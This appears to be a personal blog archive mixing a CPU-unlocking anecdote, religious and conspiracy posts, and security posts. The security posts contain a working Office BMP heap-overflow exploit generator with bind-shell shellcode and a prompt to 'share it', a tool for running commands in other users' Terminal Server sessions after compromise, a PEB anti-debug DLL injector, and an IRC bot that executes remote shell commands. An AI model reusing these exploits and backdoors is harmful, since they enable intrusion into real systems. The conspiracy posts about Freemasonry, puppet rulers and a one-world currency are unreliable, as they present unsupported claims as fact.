Well, yesterday I bought an AMD Phenom X2 550 Black Edition CPU which is a 2 core chip. Funny thing is, it has 4 cores, 2 of which are disabled either due to fabrication issues or to meet the 2 core market demand. So with a bit of luck, I hoped to get an extra 2 cores for free and save myself £100 or so.

Entering the BIOS, I enabled NCC to Auto to enable the motherboards core unlocking feature but after a reboot, no joy, still only 2 cores. Damn. So I went back in to the BIOS and install the latest BIOS flash, and get the new Unleashing option. This time set the NCC option manually to enable 4 cores and enable Unleashing.

Again, after a reboot there was only 2 cores. So I went back again and in the NCC option you could set a % value for each CPU (not sure what it actually means) and each were at 2%, so I set core 3 and 4 to be 0% and left 1 and 2 at the 2% default. Another reboot and to my delight, I see 4 Cores Enabled message!

So I install Windows and run with 4 cores to give my new children a test but the system is not that stable, so I go back to NCC option and set the cores back to AUTO. Reboot and this time the 4 cores are still seen!! Joy!! I do not know why as the first time I set it to auto they were not seen, but hey, I won't complain :)

The system is still a bit unstable so I change the CPU's new cores from the default voltage to 1.400 to give a little more power to feed the 2 new babies. After doing that, no more crying, everything is working stable and I am happy with my free 2 core upgrade :)

The 800 speed in this picture is due to me running CnQ to save power during idle time. Alas, thank you AMD for this lovely chip! Once I buy some better cooling I will get this puppy over-clocked as apparently it will run happily at 3800, very nice indeed. Was a good Friday all round.

Here is the 0day exploit code I wrote to own Microsoft office way back in April 2006, which I never seem to have published. Damn, doesn't 4 years go quick....

Anyhooo, there was a heap overflow in the rendering engine of .bmp headers in photoed.exe, winword.exe, excel.exe and powerpnt.exe which would allow an attacker the possibility of executing arbitrary, malicious code.

The vulnerability was in BMPIMP32.FLT. By modifying the value of an image header within a .bmp file, it was possible to trigger this bug and overflow a static buffer. This granted the attacker with the ability to perform an overwrite of important information within the process, leading to malicious code execution.


// Example vulnerable section of a .bmp image file:
424D3600000000000000360000002800 BM6.......6...(.
000040060000B0040000010018000000 ..@.............
00000000000000000000000000000000 ................
000000000000A9AAA8A4A5A3A8A9A7B0 ................
B3B1B2B5B3AFB1B1AFB1B1B1B3B3A7AA ................
A8AEB1AFB1B4B2AEB1AFB0B3B1B8BBB9 ................
.. snip ..


// One with malicious input 'inserted' to trigger the bug:
424D3600000000000000360000002800 BM6.......6...(.
000040060000B0040000010008004141 ..@...........AA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
41414141414141414141414141414141 AAAAAAAAAAAAAAAA
plus 10,000 more


After photoed.exe opens the malicious .bmp file, we receive:


"The instruction at "0x77f581bd" referenced memory at "0x41414141". The memory could not be "written"

(dc.cc): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00140000 ecx=41414141 edx=00196438 esi=00196438 edi=00000005
eip=77f581bd esp=0012fa3c ebp=0012fc60 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlAllocateHeap+0x60f:
77f581bd 8908 mov [eax],ecx ds:0023:41414141=????????


> 77f581bd 8908 mov [eax],ecx ds:0023:41414141=????????
> 77f581bf 894104 mov [ecx+0x4],eax


We have a classic heap overflow and can now either perform an overwrite of _VECTORED_EXCEPTION_NODE, UnhandledExceptionFilter or RtlEnterCriticalSection amongst other locations, which will return us back to malicious code and execute it for us. Another simple, useful option is to simply hijack the applications SE Handler directly which will allow us to gain control of the process in the same manner.

This same situation is present in Word, Excel and Powerpoint. If a user inserts an image in to any of these applications, the following situation is presented to us:


Word
----

0:000> gh
(e0c.fb8): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=00000004 ecx=41414141 edx=029acbe0 esi=029acbe0 edi=00140000
eip=77f8452d esp=0012df98 ebp=0012e1b0 iopl=0 nv up ei pl zr na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlSizeHeap+0x1217:

77f8452d 8901 mov [ecx],eax ds:0023:41414141=????????
77f8452f 894804 mov [eax+0x4],ecx


Excel
-----

0:000> g
(870.728): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=41414141 ebx=0020b320 ecx=41414141 edx=77fc4860 esi=00210178 edi=00177048
eip=77f69d63 esp=00dafd88 ebp=00dafdc0 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
ntdll!RtlDeleteCriticalSection+0x51:

77f69d63 8908 mov [eax],ecx ds:0023:41414141=????????
77f69d65 894104 mov [ecx+0x4],eax


PowerPoint
----------

0:000> gh
(8ec.404): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00150141 ebx=00150000 ecx=41414141 edx=41414141 esi=00196740 edi=00000004
eip=77f57ec4 esp=0013a628 ebp=0013a84c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202
ntdll!RtlAllocateHeap+0x316:

77f57ec4 890a mov [edx],ecx ds:0023:41414141=????????
77f57ec6 895104 mov [ecx+0x4],edx

/* The shady codez */

#include < stdio.h >
#include < stdlib.h >
#include < string.h >
#include < unistd.h >

#define BUFFER 10000

unsigned char bmphdr[]={ 0x42,0x4d,0x36,0x00,0x00,0x00,0x00,0x00,0x00,
0x00,0x36,0x00,0x00,0x00,0x28,0x00,0x00,0x00,
0x40,0x06,0x00,0x00,0xb0,0x04,0x00,0x00,0x01,
0x00,0x08,0x00};

unsigned char shell[] = "\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
"\x66\x68\x04\xd2\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
"\x52\xff\xd0\x68\xf0\x8a\x04\x5f\x53\xff\xd6\xff\xd0";


int main(int argc, char **argv)
{
char malware[BUFFER];
FILE *ebulfile;

puts("\nPOC exploit for Heap overflow in Photo Editor, Word, Excel and PowerPoint!");
puts("Bug discovered by c0ntex - c0ntexb@gmail.com - http://www.open-security.org\n");

if(argc != 2) {
puts("Usage: bmpb00m bmpb00m.bmp\n");
exit(EXIT_FAILURE);
}

if(strlen(argv[1]) > 20) {
puts("Sorry, file is too long!");
exit(EXIT_FAILURE);
}

ebulfile = fopen(argv[1], "w");
if(!ebulfile) {
perror("Could not create file!");
return EXIT_FAILURE;
} sleep(2);

fprintf(stderr, "Created the file [%s], now share it ;-) \n", argv[1]);

memset(malware, '\x41', BUFFER);
memcpy(malware, bmphdr, sizeof(bmphdr));
memcpy(&malware[200], shell, sizeof(shell));

// Addresses get messed up so we use some funk to get the alignment right

*(long *)&malware[1085] = 0x54909090; // Grab the 54 from here, and the 0012fc from
*(long *)&malware[1089] = 0x0012fc90; // here, ECX -> ntdll.77f51c78 -> 0x0012fc54

*(long *)&malware[1093] = 0x12345690; // Grab the 195048 from here and then we use
*(long *)&malware[1097] = 0x90900090; // the 00 from here to make EAX -> 0x00195048

fwrite(malware, sizeof(malware), 1, ebulfile);

fclose(ebulfile);

return EXIT_SUCCESS;
}

Labels: Security

This is an interesting video about the initiation methods and beginning stages within Rosecrutianism and the related orders teachings. There are some parts within the video that seem a bit far fetched, namely with regard to the sacred geometry discussions of the image of the tree of life, however the majority of the video is pretty interesting and follows commonly accepted esoteric teaching. Enjoy :)

Labels: Random, Religion, Science, Videos

This tool will enable you to run commands in another users Terminal Server session on a server where multiple people are logged in. Running this tool from a SYSTEM shell via AT (due to limitations of WTSQueryUserToken()) you then select the session to run the process in, and it will execute the process in that users session as that user.

This means that when you own a box and either gain Administrator or System access, you can execute commands in other user sessions, such as a Domain User account!! :)

The following example of this: running freerun from a compromised Local Administrator account, executing calc.exe in a Domain Users session as that user, without knowing their password :) Following is a before and after of Task Manager.



Tested and working on Windows XP, 2K3 Server and 2K8 Server.

C:\>freerun.exe

** FreeRun - A Passwordless RunAs Tool **
*****************************************

Found User -> [Administrator]
Found Window -> [Console]
Found Session -> [1]

Found User -> [user]
Found Window -> [RDP-Tcp#0]
Found Session -> [2]

Enter Session ID to freerun: 2
Enter command to execute: c:\windows\system32\calc.exe
FreeRunning in the user's session, wait...

C:\>


The tool can be downloaded from http://nodefense.org/freerun.exe
The source can be downloaded from http://nodefense.org/freerun.c


##
# Freerun - Passwordless RunAs
# Written by c0ntex - Dec 2009
##
#include <> // You must fix these spaces
#include <>
#include <>
#pragma comment(lib, "Secur32.lib")
#include <>
#pragma comment(lib, "WtsApi32.lib")

#ifndef STATUS_SUCCESS
#define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
#endif

BOOL check;


void ExecUserProc(HANDLE finalDUPToken, char * command)
{
wchar_t cmdname[40];
PROCESS_INFORMATION pi;
STARTUPINFO si;

ZeroMemory( &si, sizeof(si) );
ZeroMemory( π, sizeof(pi) );

mbstowcs(cmdname, command, 39);
cmdname[39] = '\0';

if(!CreateProcessAsUserW(
finalDUPToken,
cmdname,
cmdname,
NULL,
NULL,
FALSE,
0,
0,
NULL,
&si,
π)) {
wprintf(L"CPAU Error: %d\n\n", GetLastError());
}
}


void EnumWTSUsers(void)
{
DWORD i = 0;
DWORD DWUserLen = 0;
DWORD DWSessNum = 0;
ULONG lcount;
PLUID lusers;
NTSTATUS enumstatus;
LPWSTR wtsUserAcct = NULL;
PWTS_SESSION_INFO pSessInfo = NULL;

check = WTSEnumerateSessions(
WTS_CURRENT_SERVER_HANDLE,
0,
1,
&pSessInfo,
&DWSessNum);
if(!check) {
printf("WTSEnumerateSessions error: %s\n", GetLastError());
_exit(1);
}

enumstatus = LsaEnumerateLogonSessions(
&lcount,
&lusers);
if(enumstatus != STATUS_SUCCESS) {
wprintf (L"LsaEnumerateLogonSessions error: %u\n", enumstatus);
LsaNtStatusToWinError(enumstatus);
_exit(1);
}

LsaFreeReturnBuffer(lusers);

for(i = 0; i < state ="="> [%s]\nFound Window -> [%s]\nFound Session -> [%d]\n\n",
wtsUserAcct,
pSessInfo[i].pWinStationName,
pSessInfo[i].SessionId);

Sleep(1000);
} else {
DWSessNum--;
}
}
WTSFreeMemory(pSessInfo);
}


HANDLE getWTSHandle(int i)
{
HANDLE wtsHandle = NULL;

if(!WTSQueryUserToken(
i,
&wtsHandle)) {
wprintf(L"\n\nOps: WTSQueryUserToken error: %d\nMaybe you used the wrong sessionID value...\n", GetLastError());
exit(1);
}

return wtsHandle;
}


void useWTSSession(HANDLE finalDUPToken, char * command)
{
ExecUserProc(finalDUPToken, command);
CloseHandle(finalDUPToken);
}


BOOL GetUser(void)
{
TCHAR uName[256] = {0};
DWORD unSize = sizeof(uName);

if(!GetUserNameW(
uName,
&unSize)) {
printf("GetUserNameW error: %d\n", GetLastError());
}
if(!wcsstr(uName, L"SYSTEM")) {
return FALSE;
}
return TRUE;
}


int main(int argc, char * argv[])
{
char session[4] = {0};
char command[40] = {0};
char * stripper = NULL;
HANDLE wtsDupToken = NULL;

printf("\n** FreeRun - A Passwordless RunAs Tool **\n");
printf("*****************************************\n\n");

EnumWTSUsers();

check = GetUser();
if(check == FALSE) {
printf("Sorry, you must run this tool with SYSTEM rights!\n\n");
exit(1);
}

printf("Enter Session ID to freerun: ");
if(fgets(
session,
sizeof(session),
stdin) != NULL) {
if((strlen(session) -1 > 1)) {
printf("Invalid session number, try again!\n");
exit(1);
}
stripper = strchr(
command,
'\n');
if(stripper != NULL) {
*stripper = '\0';
}
}
session[3] = '\0';

stripper = NULL;

printf("Enter command to execute: ");
if(fgets(
command,
sizeof(command),
stdin) != NULL) {
if(strlen(command) -1 > 39) {
printf("Invalid command name, try again!\n");
exit(1);
}
stripper = strchr(
command,
'\n');
if(stripper != NULL) {
*stripper = '\0';
}
}
command[39] = '\0';

Sleep(1000);
printf("FreeRunning in the user's session, wait...\n");

wtsDupToken = getWTSHandle(atoi(session));
if(!wtsDupToken) {
printf("Something has gone wrong getting the handle...\n");
CloseHandle(wtsDupToken);
exit(1);
}

useWTSSession(
wtsDupToken,
command);

CloseHandle(wtsDupToken);

return 0;
}

Labels: Security

Nice nasheed :)

Labels: Religion

and if the news is right, it could be that champion for truth, human rights, fairness, removal of oppression and activist against injustice, Mr Tony "yes man" Blair?

The man who is, or should I say was (apparently old dogs can learn new tricks) all for illegal wars, the murdering of millions of innocent people and lets not forget the murdering of fellow British citizens to back old alliances, including the British monarchy, to help expand the 'global' British imperial empire, could potentially be the president of not just the UK, but of the entire European region.

Obviously this is a move to centralise European power behind one man, or should I say, one puppet, just like they did with Obama in the US of A.

Now we have 2 puppets who are going to be seen as the rulers of pretty much half the planet, or at least they will be the face and voice for that power.

I really like this image on the left, it shows the clear picture of what is going on. If you can't see it yourself, let me help you. The hand of the cardinal is completely up Tony's bottom helping to make his lips and eyes move. Hence the reason why the royal red cloak is tightly wrapped around the 'Priminister to be's' posterior.

Labels: Political

This is an old post that got removed some how - Added back.

Remember the days when life was simple and things didn't matter. Now, as each second ticks by, the societies we occupy seem to overflow that little bit more with a needless desire to embrace the foul, sesspits that material life has to offer. Our grooming and desensitization from the negative trinkets of the world is unpraralleled, some say that history repeats itself and this for sure a certainty.

We are now back to the Babylonian days where the most undesirable things became the overwhelming desire for the populus. 100 years ago, nudity, drunkeness, ludeness and the likes was frowned upon, yet here we are today. Now further advanced in our technological innovations, man seems to have advanced so far yet for some oxymoronic reason, regressed even further and with our freshly aquired ego and knowledge, we are suffering from an accute deteriaration of goodness.

The state of our children is simply a reflection of the adults and the society they develop and grow in. A child is a blank canvase and only develops and grows according to the inputs it receives from it's surroundings, this is a simple sociological fact. So we ask why are the children wanting to do drugs, drink booze, have promiscuous sex, and all these things? It is quite simple, their education, their friends, their examples and their society are all bias toward these things.

Then is it any surprise that in 2007 in the mighty US of A, over 90,427 reported rapes occurred and more than 1,408,337 violent crimes took place? These are staggering numbers for the most 'free and advanced' nation in the world. These number by the way are taken from http://www.fbi.gov and not made up :)

If you watch the TV, read a newspaper or even walk down the street today you are bombarded with images of half-nude women advertising coca-cola, men and women dressed as if they are auditioning for a porn movie, reality TV shows where misguided celebrities (who are the role models for our youth) talk about their sordid sexual relations, drink and drug binges and the likes, it is of little surprise when your little Tommy comes home stoned and Tabatha comes home pregnant.

Children simply mimic the peers they have and when the society as a whole is obsessed with football, drinking and drugs, partying and 'living it up', what else can we expect to happen to them, they will simply do the same. The ironic fact is that the majority of people don't really care about this problem until it hits home, and when it does they blame the junkies, the prostitutes and the governments lack of involvement for their childs impoverished state. The reality is, however, that it is none of these things that have caused the problem, it is simply a case misguided education.

An example of this is many of the young guys I know. I asked some of them if sleeping around with girls was something that should be abandoned and replaced with a 'marriage first' institution like in Islam and Christianity, etc. The overwhelming response was 'um, no', sleeping around was fun and cool and religion had no practicle implementation.

I then asked the same people what they would think if their daughter was the target of guys thinking how you were today, seeing her as a piece of meat to sleep with for one night and then forget about. The honest ones were outraged at this suggestion and for some reason stated that sleeping around was no longer ok in this situation.... Double standards?

It is wierd how things change when, as I said, when it comes home.

Education starts with and ends with the parents, and if they are misguided then I ask what hope is there?


"Children as young as 12 are being treated in a new specialist addiction unit set up to deal with those hooked on alcohol and drugs.

The Priory hospital, which is famous for its celebrity patients, set up the unit to meet what it says is mounting demand from worried parents. The unit, based at its acute psychiatric hospital in north London, will deal with drug and alcohol problems, eating disorders and behavioural issues such as an obsession with the internet or computer games."

http://news.independent.co.uk/uk/health_medical/article2578491.ece

Labels: Random

This is an old post that got deleted some how - Added back.

...the forbidden knowledge?

"All truth passes through three stages. First, it is ridiculed, second it is violently opposed, and third, it is accepted as self-evident." - Arthur Schopenhauer

A pretty cool site, enjoy!


http://www.theforbiddenknowledge.com


"In 1990 I started studying UFOs. I came home from work one evening, turned on the Television like most other people do and airing on the FOX Network was a show called, "Sightings". It was a show dedicated to the unexplained. It often showed UFO footaqe from around the world. The footage they were playing that night was very convincing to me so I decided to look into the subject further. As time went by I expande my research to the Bible and ancient civilizations. I had no idea where this research would lead me.

A couple years went by and in those I managed to collect an impressive store of UFO video footage from television. I would listen to UFO "experts" such as Stanton Freedman talk about the U.S. Governments involvement in the secrecy of UFOs. As time went on I realized that individuals like Stanton were part of an evil scheme. I listened to Art Bell late at night every night gathering as much information as I could. But even with Art Bell I grew suspicious.

A friend of mine gave me a copy of Bramley's book and I began to read it. As my level of awareness rose I realized secret societies and how they worked. As time went on it all became much clearer to me. I also realized that people are not always what they seem.

When my level of awareness rose to a certain point I had to write about it. I'm not the type of person to sit on something so awesome. I had to tell others of the things I was realizing. In learning you will teach, and in teaching you will learn. So I am doing just that.

Bramley mentions the conflict in the Bible between "God" and the Serpent. "God" was trying to keep a certain type of knowledge away from Mankind and the Serpent was trying to teach Mankind that knowledge. The victor of that conflict would be the ones (yes plural!) who controlled earth.

In Eden the members of "God" made it a sin to eat of the fruit. The fruit is an apple and it is symbolic for a certain kind of knowledge. To help keep Man away from that knowledge they taught that if Man learned it he would die.

Asking the question, "Why should learning knowledge be a sin?" (the original sin) and comparing it to modern day observations ought to wake you up to the fact that you live within societal system that was engineered by the members of "God" to empower themselves while keeping those who live within it ignorant. Do you want to test this theory?

Write down on a piece of paper all the things that you own. Next, for each item ask yourself, "Did I design and manufacture this item?" A majority of things within your home you purchased and have no knowledge of how they were designed or built. "The Custodians [God] clearly did not want mankind to begin traveling the road to spiritual recovery." PP 48. One sure way is to keep knowledge away from the human race. The information they do not want you to learn however is not of the technological kind, it is The Forbidden Knowledge. Methods used to control an entire world and to keep the personalities who live in that world spiritually ignorant and unaware of the prison system they are caught in. Did you learn anything about Freemasonry's dominate presence on earth in grade school?

The bible says Satan is a destroyer, it also says in II Corinthians 4 that he controls earth. This should be of no surprise to you with what you just learned because it coincides with modern day observations.

The social system you live within lies to you. It conditions your mind to think that you are the most advanced human earth has ever seen when in fact, the reverse is true. You are dependant on it for all your basic needs. Everything is already prepare for you. Your clothes come from department stores, your food comes from grocery stores, and your home was most likely not designed and built by you either. Do you think that is progress? The bottom line is, you can use technology but you cannot design and build your own unless you have a lot of money and who controls the money? Freemasonry.

The Custodial-designed societal system includes an education sub system that produces robots, people who all think the same way and an employment sub system which furthers that robotic behavior. This makes it easier for them to control the people because a robot never questions authority and does what everyone else does. Bramley's book reveals that Satan traded places with God in Eden and fooled the human race. Modern day observations prove this."

http://www.theforbiddenknowledge.com/godsofeden/index.htm

Labels: Religion

This is an old post that got removed some how - Added back.

I love media propaganda, it is really cool. A fast, cost effective way to use suggestive techniques to massage and manipulate the society it serves by implanting ideas, feelings, emotions and realities in to peoples mind.

The worst part though is that this happens WITHOUT any form of resistance! Since the victim is self inducing themselves by willingly buying and reading the newspapers, magazines, TV licenses, etc.... Very clever.

What is cooler though, is being able to see it for what it is. And thank God I am able to understand what is going on. :)

Anyway, I saw this report on the independent, which is a reasonable paper in the UK, not great but it's ok. Anyway, today it is discussing another pop start insisting on being paid in Euros

http://news.independent.co.uk/world/americas/article3169653.ece

apposed to ever declining Dollars. This might seem trivial at first glance, but coupled with the media coverage last month of a model who asked the same, it is clear the media (foreign and domestic) want to push the thought that the Euro is the new cool item.

http://youtube.com/watch?v=wiuNd5SoU8E

jay-Z used to drop some decent tunes, but obviously not anymore as you see from that video, but you certainly see Euros as his "bread" numerous times. Maybe a wild coincidence....

"Look all the famous, cool people in the world are using it, shouldn't you, don't you want to be cool too?!" is what the media is shouting out!!

So, this goes back to the discussion about a One World Government and a One World Currency

Check out: http://video.google.co.uk/videoplay?docid=-448659287463550973

The Dollar isn't here to stay, I think that is clear - but will a second push for the Pound Sterling and UK to adopt the Euro again by "British Government" happen too? Interesting.

Labels: Random

I was dead, in the seas of error and sin, drowned.
I was a slave in the shackles of sin, owned, fettered.
The Shaytan passed his rope down to me from his many ways.
Sins, I would go to them sunset and sunrise,

The sins attacked my skin then bones... then veins.
I was enrolled in the glitter of the star of this world.
Truly, I am in need of rain, purifying, able to clean.

I do not like Wikipedia, it's information in many cases is extremely bias and inaccurate, they are unwilling to promote facts yet unfortunatly, they are seen as the most authoritive figure in inter-fact.

If you don't believe me, google for things like "wikipedia inaccuracies", "wikipedia biased", "wikipedia inaccurate" or any other likely keywords and wake up!

Just who is editing and managing wiki articles?

"if Wikipedia is "history", then history is indeed bunk" - Petronella Wayte.

Rather than Wikidpedia, I rather this cool site which seems to promote a more accurate version of current information and historical record based on fact. Better job.

http://www.conservapedia.com/Main_Page

Labels: Random

Webster Tarpley has released a new book called "Obama, The Unauthorised Biography".

If you do not know who Webster Tarpley is, here is a link to his site: http://www.tarpley.net

#### Part One



#### Part Two



Anyway, after all that, now the last video - this is an interesting view, please enjoy it and leave a comment :)

Labels: Random, Videos

I wrote a little DLL injector to switch off IsBeingDebugged and reset the NtGlobalFlags entries in the processes PEB. Pointless really since there are numerous OllyDBG / IDA plugins to do it, but I had some free time.

Final version as always can be found at open-security.org or nodefense.org


/*
dll_inject.c
Injects isdebugged.dll to switch off IsDebugged flag in PEB structure.
*/
#include
#include

int main(int argc, char * argv[])
{
char buff[50] = {0};
char * mydll = "isdebugged.dll";
unsigned long procID = 0;
DWORD hLibModule = 0;
HANDLE Proc = NULL, hThread = NULL;
HWND targetWnd;
LPVOID VaMemSpace, MyLibLoad;
LPCWSTR windowName = L"Command Prompt";
CONTEXT context;

targetWnd = FindWindow(
NULL,
windowName);

if(!GetWindowThreadProcessId(
targetWnd,
&procID)) {
printf("GetWindowThreadProcessId error: %d", GetLastError());
exit(1);
}

if(!procID) {
exit(1);
}

printf("Got process ID [%lu]\n", procID);

Proc = OpenProcess(
PROCESS_CREATE_THREAD|SYNCHRONIZE|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,
FALSE,
procID);

if(Proc == NULL) {
printf("OpenProcess error: %d\n", GetLastError());
return FALSE;
}

MyLibLoad = GetProcAddress(
GetModuleHandle(
L"kernel32.dll"),
"LoadLibraryA");

VaMemSpace = VirtualAllocEx(
Proc,
NULL,
strlen(mydll),
MEM_COMMIT|MEM_RESERVE,
PAGE_READWRITE);

if(VaMemSpace == NULL) {
printf("VirtualAlloc error: %d\n", GetLastError());
return FALSE;
}

WriteProcessMemory(
Proc,
VaMemSpace,
mydll,
strlen(mydll),
NULL);

if(WriteProcessMemory == 0) {
printf("WriteProcessMemory error: %d", GetLastError());
return FALSE;
}

CreateRemoteThread(
Proc,
NULL,
NULL,
(LPTHREAD_START_ROUTINE)MyLibLoad,
VaMemSpace,
NULL,
NULL);

if(CreateRemoteThread == NULL) {
printf("CreateRemoteThread error: %d\n", GetLastError());
return FALSE;
}

printf("Created the new thread!\n");

CloseHandle(hThread);

VirtualFreeEx(
Proc,
VaMemSpace,
sizeof(mydll),
MEM_RELEASE);

if(VirtualFreeEx == 0) {
printf("VirtualFreeEx error: %d\n", GetLastError());
return FALSE;
}
return TRUE;
}



/*
isdebugged.dll

Resets IsBeingDebugged PEB entry
Resets NtGlobalFlags PEB entry
*/

#include
#include
#include

__declspec(dllexport) void SetINT(void)
{
printf("Setting INT 3 trap\n");
_asm
{
int 3
}
}

__declspec(dllexport) void SetDebugFlag(void)
{
printf("Resetting PEB's BeingDebugged entry\n");
_asm
{
mov eax, dword ptr fs:[0x18]
mov eax, dword ptr ds:[eax+0x30]
test eax, eax
mov byte ptr ds:[eax+0x2], 0x0
}
printf("Resetting PEB's NtGlobalFlags entry\n");
_asm
{
mov eax, dword ptr fs:[0x18]
mov eax, dword ptr ds:[eax+0x30]
mov byte ptr ds:[eax+0x68], 0x0
}
printf("Done modifying PEB\n");
}

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved, int argc, char * argv[])
{
switch(ul_reason_for_call)
{
case DLL_PROCESS_ATTACH:

printf("Entering the process... Weee!\n");
SetDebugFlag();
break;

case DLL_PROCESS_DETACH:
printf("Leaving the process... Poof!\n");
break;
}
return TRUE;
}

Labels: Security

/*
* An SSL IRC bot that will run some commands on teh hoster, useful for running
* john on your linux box via irc during a pentest - cheap man's VPN ;)
*
* Has a couple of little bugs which I might fix, but it serves it's simple purpose.
*
* You should change the stuff in SSLTYPE1 & SSLTYPE2 to match your own box, I
* just added that as a test to see if it would tell if a MITM was present.
*
*/
#include < stdio.h > // You will have to fix these spaces, blogspot's fault.
#include < string.h >
#include < unistd.h >
#include < arpa/inet.h >
#include < sys/ptrace.h >
#include < sys/socket.h >
#include < sys/types.h >
#include < resolv.h >
#include < netdb.h >
#include < openssl/ssl.h >
#include < openssl/err.h >

#define OWNER "x0ng@i.r.steppin.down"
#define NICK "ruxxbot"
#define USER "ruxxbot"
#define CHAN "home"
#define SERV "nodefense.org"
#define PASS "" //channel password
#define PORT 65531

#define LABEL "t3hrUxx0r"
#define SSLTYPE1 "AES256-SHA"
#define SSLTYPE2 "TLSv1i/SSLv3"
#define BSIZE 80


SSL_CTX*
initctx(void)
{
SSL_METHOD *method;
SSL_CTX *ctx;
SSL_library_init();
OpenSSL_add_all_algorithms();

method = SSLv23_client_method();
ctx = SSL_CTX_new(method);

return ctx;
}


void
srvsend(SSL *ssl, char *msg)
{
if(SSL_write(ssl, msg, strlen(msg)) < 1)
exit(1);
}


char *
srvread(SSL *ssl)
{
int bytes;
char buf[4096] = {0};
char * msgbuf = (char *)malloc(BSIZE);
char * ret = NULL;

bytes = SSL_read(ssl, buf, sizeof(buf)-1);
if(!bytes)
exit(1);

if((strlen(buf) > 2047) || strlen(buf) < 1)
exit(1);

buf[2047] = '\0';

if(strstr(buf, "PING")) {
sleep(2);
memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(SERV) + 8, "PONG :%s\r\n", SERV);
srvsend(ssl, msgbuf);
}

free(msgbuf);
msgbuf = NULL;

ret = buf;
return ret;
}


void
runcmd(SSL *ssl, char * cmdptr)
{
char buf[256] = {0};
char * cmdbuf = (char *)malloc(2048);
char * lol = NULL;
FILE * sys = NULL;

memset(cmdbuf, 0, 2048);

if((strlen(cmdptr) > 256) || (strlen(cmdptr) < 1))
return;

lol = strchr(cmdptr, '!e ');
if(!lol)
return;

lol[strlen(lol)-2] = '\0';

sys = popen(lol, "r");
if(!sys)
return;

while(fgets(buf, sizeof(buf)-1, sys)) {
snprintf(cmdbuf, strlen(buf) + strlen(OWNER) + 11, "PRIVMSG #%s %s\n", CHAN, buf);
srvsend(ssl, cmdbuf);
}
free(cmdbuf);
cmdbuf = NULL;

pclose(sys);
}


void
op(SSL *ssl)
{
char * opbuf = (char *)malloc(BSIZE);

snprintf(opbuf, strlen(CHAN) + 15, "MODE #%s +o x0ng\n", CHAN);
srvsend(ssl, opbuf);

free(opbuf);
opbuf = NULL;
}


void
srvconn(SSL *ssl)
{
char * cmd = NULL;
char * cmdptr = NULL;
char * msgbuf = (char *)malloc(BSIZE);

struct set
{
char * chan;
char * pass;
char * user;
char * nick;
} irc;

irc.chan = CHAN;
irc.user = USER;
irc.nick = NICK;
irc.pass = PASS;

if(strlen(irc.chan) > 15 && strlen(irc.pass) > 15 && strlen(irc.user) > 15 && strlen(irc.nick) > 15)
exit(1);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.nick)+7, "NICK %s\r\n", irc.nick);
srvsend(ssl, msgbuf);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + strlen(irc.user) + 11, "USER %s %s %s :%s\r\n", irc.user, irc.user, irc.user, irc.user);
srvsend(ssl, msgbuf);

memset(msgbuf, 0, BSIZE);
snprintf(msgbuf, strlen(irc.chan) + strlen(irc.pass) + 9, "JOIN #%s %s\r\n", irc.chan, irc.pass);
srvsend(ssl, msgbuf);

for(;;) {
cmd = srvread(ssl);
//printf("\n%s\n", cmd); // Debug
